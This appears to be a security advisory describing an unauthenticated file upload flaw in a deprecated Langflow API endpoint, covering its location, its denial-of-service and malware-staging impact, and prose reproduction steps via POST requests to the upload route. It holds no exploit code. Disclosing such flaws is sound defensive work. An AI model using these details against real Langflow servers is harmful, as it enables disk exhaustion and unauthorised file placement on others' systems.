Langflow Unauthenticated File Upload Vulnerability in API Endpoint

A vulnerability allowing unrestricted file uploads has been identified in Langflow versions through 1.1.0. This issue arises from a deprecated API endpoint that lacks authentication and ownership validation, enabling remote users to upload files to the server. The vulnerability is located in the 'create_upload_file' function within 'src/backend/base/Langflow/api/v1/endpoints.py'. The absence of proper checks can lead to denial-of-service conditions by filling up server disk space or inodes.

Impact

Exploitation of this vulnerability can cause a denial-of-service condition by exhausting server disk space or inodes. Additionally, it allows for the unauthorized upload of files, which could be used to stage malware on the server.

Reproduction

The vulnerability can be reproduced by sending a POST request to the '/api/v1/upload/{flow_id}' endpoint with a file attached. This can be done using a Python script that automates the file upload process. The endpoint will accept the file without any authentication, and the uploaded file will be saved on the server.